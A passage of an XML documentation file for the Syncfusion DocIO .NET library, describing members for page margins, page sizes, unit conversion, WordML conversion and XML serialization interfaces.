            <param name="section">Current section</param>
            <param name="sectionIndex">Current section index</param>
            <returns>returns the footer referred by the current section by comparing the current and preceeding section</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextConverter.GetHeader(Syncfusion.DocIO.DLS.WSection,System.Int32)">
            <summary>
            Returns the header referred by the current section
            </summary>
            <param name="section">Current section</param>
            <param name="sectionIndex">Current section index</param>
            <returns>returns the header referred by the current section by comparing the current and preceeding section</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Utf8Checker.IsUtf8(System.IO.Stream)">
            <summary>
            Check if stream is utf8 encoded.
            Notice: stream is read completely in memory!
            </summary>
            <param name="stream">Stream to read from.</param>
            <returns>True if the whole stream is utf8 encoded.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Utf8Checker.HasExtendedASCIICharacter(System.IO.Stream)">
            <summary>
            Determines whether the specified stream has extended ASCII character.
            </summary>
            <param name="stream">The stream.</param>
            <returns>
              <c>true</c> if the specified stream has extended ASCII character; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWarning">
            <summary>
            Represents the IWarning and can be used to notify the warnings occurred in Word document to PDF conversion.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWarning.ShowWarnings(System.Collections.Generic.List{Syncfusion.DocIO.DLS.WarningInfo})">
            <summary>
            Shows the warning messages that describes the unsupported elements found while converting the specified Word document to PDF.
            </summary>
            <param name="warnings">The warnings.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WarningInfo">
            <summary>
            Represents the WarningInfo and it contains the Warning type and its description for the unsupported elements in Word document to PDF conversion.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningInfo.m_description">
            <summary>
            The m_description of the warning
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningInfo.m_warningType">
            <summary>
            The m_warning type
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WarningInfo.#ctor(System.String,Syncfusion.DocIO.DLS.WarningType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WarningInfo"/> class.
            </summary>
            <param name="description">The description.</param>
            <param name="warningType">Type of the warning.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WarningInfo.Description">
            <summary>
            Gets the description about specified warning
            </summary>
            <value>
            The description.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WarningInfo.WarningType">
            <summary>
            Gets the warning type
            </summary>
            <value>
            The type of the warning.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Margins">
            <summary>
            Represents the page margins of the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Margins.m_iLeft">
            <summary>
            storage of Left margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Margins.m_iRight">
            <summary>
            storage of Right margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Margins.m_iTop">
            <summary>
            storage of Top margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Margins.m_iBottom">
            <summary>
            storage of Bottom margin
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Margins.#ctor">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.Margins"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Margins.#ctor(System.Int32,System.Int32,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.Margins"/> class with the specified left, top, right and bottom margin values in points.
            </summary>
            <param name="left">The value for left margin in points.</param>
            <param name="top">The value for top margin in points.</param>
            <param name="right">The value for right margin in points.</param>
            <param name="bottom">The value for bottom margin in points.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Margins.All">
            <summary>
            Gets or sets the value of all the four <see cref="T:Syncfusion.DocIO.DLS.Margins"/> on one call measured in points.
            </summary>
            <value>The <b>integer</b> that specifies the margin values in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Margins.Left">
            <summary>
            Gets or sets the left margin value in points.
            </summary>
            <value>The <b>integer</b> that specifies the left margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Margins.Right">
            <summary>
            Gets or sets the right margin value in points.
            </summary>
            <value>The <b>integer</b> that specifies the right margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Margins.Top">
            <summary>
            Gets or sets the top margin value in points.
            </summary>
            <value>The <b>integer</b> that specifies the right margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Margins.Bottom">
            <summary>
            Gets or sets the bottom margin value in points.
            </summary>
            <value>The <b>integer</b> that specifies the bottom margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Margins.IsAll">
            <summary>
            Allow to check is all settings has the same value or not
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MarginsF">
            <summary>
            Represents the page margins of the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MarginsF.m_fLeft">
            <summary>
            storage of Left margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MarginsF.m_fRight">
            <summary>
            storage of Right margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MarginsF.m_fTop">
            <summary>
            storage of Top margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MarginsF.m_fBottom">
            <summary>
            storage of Bottom margin
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MarginsF.m_fGutter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MarginsF.#ctor">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.MarginsF"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MarginsF.#ctor(System.Single,System.Single,System.Single,System.Single)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.MarginsF"/> class with the specified left, top, right and bottom margin values in points.
            </summary>
            <param name="left">The value for left margin in points.</param>
            <param name="top">The value for top margin in points.</param>
            <param name="right">The value for right margin in points.</param>
            <param name="bottom">The value for bottom margin in points.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MarginsF.Clone">
            <summary>
            Creates a duplicate copy of the <see cref="T:Syncfusion.DocIO.DLS.MarginsF"/> instance.
            </summary>
            <returns>The reference of the newly created <see cref="T:Syncfusion.DocIO.DLS.MarginsF"/> instance.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.All">
            <summary>
            Gets or sets the value of all the four <see cref="T:Syncfusion.DocIO.DLS.MarginsF"/> on one call measured in points.
            </summary>
            <value>The <b>float</b> that specifies the margin values in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.Left">
            <summary>
            Gets or sets the left margin value in points.
            </summary>
            <value>The <b>float</b> that specifies the left margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.Right">
            <summary>
            Gets or sets the right margin value in points.
            </summary>
            <value>The <b>float</b> that specifies the right margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.Top">
            <summary>
            Gets or sets the top margin value in points.
            </summary>
            <value>The <b>float</b> that specifies the top margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.Bottom">
            <summary>
            Gets or sets the bottom margin value in points.
            </summary>
            <value>The <b>float</b> that specifies the bottom margin value in points.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.IsAll">
            <summary>
            Allow to check is all settings has the same value or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MarginsF.Gutter">
            <summary>
            Gets/sets section gutter.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PageSize">
            <summary>
            Represents the information about page size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.A3">
            <summary>
            Specifies A3 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.A4">
            <summary>
            Specifies A4 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.A5">
            <summary>
            Specifies A5 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.A6">
            <summary>
            Specifies A6 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.B4">
            <summary>
            Specifies B4 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.B5">
            <summary>
            Specifies B5 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.B6">
            <summary>
            Specifies B5 format. page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Letter">
            <summary>
            Specifies Letter format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.HalfLetter">
            <summary>
            Specifies HalfLetter format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Letter11x17">
            <summary>
            Specifies 11x17 format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.EnvelopeDL">
            <summary>
            Specifies EnvelopeDL format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Quarto">
            <summary>
            Specifies Quarto format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Statement">
            <summary>
            Specifies Statement format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Ledger">
            <summary>
            Specifies Ledger format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Tabloid">
            <summary>
            Specifies Tabloid format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Note">
            <summary>
            Specifies Note format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Legal">
            <summary>
            Specifies Legal format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Flsa">
            <summary>
            Specifies Flsa format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageSize.Executive">
            <summary>
            Specifies Executive format page size.
            </summary>
            <value>The <see cref="T:System.Drawing.SizeF"/> structure that represent the size of the page.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PageSize.#ctor">
            <summary>
            Private constructor.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PointsConverter">
            <summary>
            Provides functions for unit conversions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PointsConverter.FromCm(System.Single)">
            <summary>
            Converts centimeter to points.
            </summary>
            <param name="centimeter">The <b>float</b> that represents the value in centimeter.</param>
            <returns>The <b>float</b> that specifies the value in points.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PointsConverter.FromInch(System.Single)">
            <summary>
            Converts inch to points.
            </summary>
            <param name="inch">The <b>float</b> that represents the value in inch.</param>
            <returns>The <b>float</b> that specifies the value in points.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PointsConverter.FromPixel(System.Single)">
            <summary>
            Converts pixel to points.
            </summary>
            <param name="inch">The <b>float</b> that represents the value in pixel.</param>
            <returns>The <b>float</b> that specifies the value in points.</returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter">
            <summary>
            Summary description for WordMLtoDocIOConverter.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.m_xmlWordML">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.m_bookmarkList">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.m_nsmng">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Convert(System.String)">
            <summary>
            Converts the specified word as ml.
            </summary>
            <param name="pathToWordML">The path to word ML.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.CorrectXML">
            <summary>
            Corrects the XML.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.ModifyParagraph(System.Xml.XmlNode)">
            <summary>
            Modifies the paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.ModifyBookmark(System.Xml.XmlNode)">
            <summary>
            Modifies the bookmark.
            </summary>
            <param name="bookmark">The bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.ModifyPicture(System.Xml.XmlNode)">
            <summary>
            Modifies the picture.
            </summary>
            <param name="picture">The picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.InitNamespaceManager">
            <summary>
            Initialize the namespace manager.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.GetXsltReader">
            <summary>
            Gets the XSLT reader.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.ReadBinaryElement(System.Xml.XmlNode)">
            <summary>
            Reads the binary element.
            </summary>
            <param name="node">The node.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.ReadImage(System.Xml.XmlNode,System.Boolean)">
            <summary>
            Reads the image.
            </summary>
            <param name="node">The node.</param>
            <param name="isMetaFile">if it is meta file, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Bookmark">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Bookmark.m_strName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Bookmark.m_strID">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Bookmark.Name">
            <summary>
            Gets or sets the name.
            </summary>
            <value>The name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Bookmark.ID">
            <summary>
            Gets or sets the ID.
            </summary>
            <value>The ID.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.BookmarkCollection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.BookmarkCollection.m_iID">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.BookmarkCollection.Add(Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.Bookmark)">
            <summary>
            Adds an object to the end of the <see cref="T:System.Collections.ArrayList"/>.
            </summary>
            <param name="value">The <see cref="T:System.Object"/> to be added to the end of the <see cref="T:System.Collections.ArrayList"/>. The value can be <see langword="null"/>.</param>
            <returns>
            The <see cref="T:System.Collections.ArrayList"/> index at which the <paramref name="value"/> has
            been added.
            </returns>
            <exception cref="T:System.NotSupportedException">
            	<para>The <see cref="T:System.Collections.ArrayList"/> is read-only.</para>
            	<para>-or-</para>
            	<para>The <see cref="T:System.Collections.ArrayList"/> has a fixed size.</para>
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.BookmarkCollection.Add(System.String)">
            <summary>
            Adds the bookmark.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordMLtoDocIOConverter.BookmarkCollection.Item(System.String)">
            <summary>
            Gets the <see cref="T:System.String"/> with the specified name.
            </summary>
            <value></value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter">
            <summary>
            Summary description for IXDLSAttributeWriter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.Single)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.Double)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.Int32)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.String)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.Enum)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.Boolean)">
            <summary>
            Writes the value.
            </summary>
            <param name="name">The name.</param>
            <param name="value">if it specifies value, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.Drawing.Color)">
            <summary>
            Writes color as string to XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <param name="value">Color structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter.WriteValue(System.String,System.DateTime)">
            <summary>
            Writes DateTime as string to XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <param name="value">Color structure.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader">
            <summary>
            Summary description for IXDLSAttributeReader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.HasAttribute(System.String)">
            <summary>
            Determines whether the current node has attribute with specified name.
            </summary>
            <param name="name">The name.</param>
            <returns>
            	if has attribute with specified name, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadString(System.String)">
            <summary>
            Reads the string.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadInt(System.String)">
            <summary>
            Reads the int.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadShort(System.String)">
            <summary>
            Reads the short.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadFloat(System.String)">
            <summary>
            Reads the float.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadBoolean(System.String)">
            <summary>
            Reads the boolean.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadByte(System.String)">
            <summary>
            Reads the byte.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadEnum(System.String,System.Type)">
            <summary>
            Reads the enum.
            </summary>
            <param name="name">The name.</param>
            <param name="enumType">Type of the enum.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadColor(System.String)">
            <summary>
            Reads color from XML.
            </summary>
            <param name="name">Name of attribute.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader.ReadDateTime(System.String)">
            <summary>
            Reads the date time.
            </summary>
            <param name="s">The s.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter">
            <summary>
            Summary description for IXDLSContentWriter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter.WriteChildBinaryElement(System.String,System.Byte[])">
            <summary>
            Writes the child binary element.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter.WriteChildStringElement(System.String,System.String)">
            <summary>
            Writes the child string element.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter.WriteChildElement(System.String,System.Object)">
            <summary>
            Writes the child element.
            </summary>
            <param name="name">The name.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter.WriteChildRefElement(System.String,System.Int32)">
            <summary>
            Writes the child ref element.
            </summary>
            <param name="name">The name.</param>
            <param name="refToElement">The ref to element.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter.InnerWriter">
            <summary>
            Gets the inner writer.
            </summary>
            <value>The inner writer.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader">
            <summary>
            Summary description for IXDLSContentReader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.GetAttributeValue(System.String)">
            <summary>
            Gets the attribute value.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.ParseElementType(System.Type,System.Enum@)">
            <summary>
            Parses the type of the element.
            </summary>
            <param name="enumType">Type of the enum.</param>
            <param name="elementType">Type of the element.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.ReadChildElement(System.Object)">
            <summary>
            Reads the child element.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.ReadChildElement(System.Type)">
            <summary>
            Reads the child element.
            </summary>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.ReadChildStringContent">
            <summary>
            Reads the content of the child string.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.ReadChildBinaryElement">
            <summary>
            Reads the child binary element.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.TagName">
            <summary>
            Gets the name of the tag.
            </summary>
            <value>The name of the tag.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.NodeType">
            <summary>
            Gets the type of the node.
            </summary>
            <value>The type of the node.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.InnerReader">
            <summary>
            Gets the inner reader.
            </summary>
            <value>The inner reader.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSContentReader.AttributeReader">
            <summary>
            Gets the attribute reader.
            </summary>
            <value>The attribute reader.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSFactory">
            <summary>
            Summary description for IXDLSFactory.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSFactory.Create(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the specified reader.
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.PropertyNames">
            <summary>
            Utility class. Holds string names of the properties, used for serialization.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.X1">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.X2">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Y1">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Y2">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.X3">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.X4">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Y3">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Y4">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Type">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.X">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Y">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Width">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Height">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.StartAngle">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.SweepAngle">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.FillMode">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Items">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Item">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Points">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Point">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Style">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Text">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Shapes">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.BorderColor">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Format">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.ShapeFormat">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.NoFill">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.Color">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.GradientFill">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.GradientColorStart">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.GradientColorEnd">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.GradientMode">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.PropertyNames.NoLine">
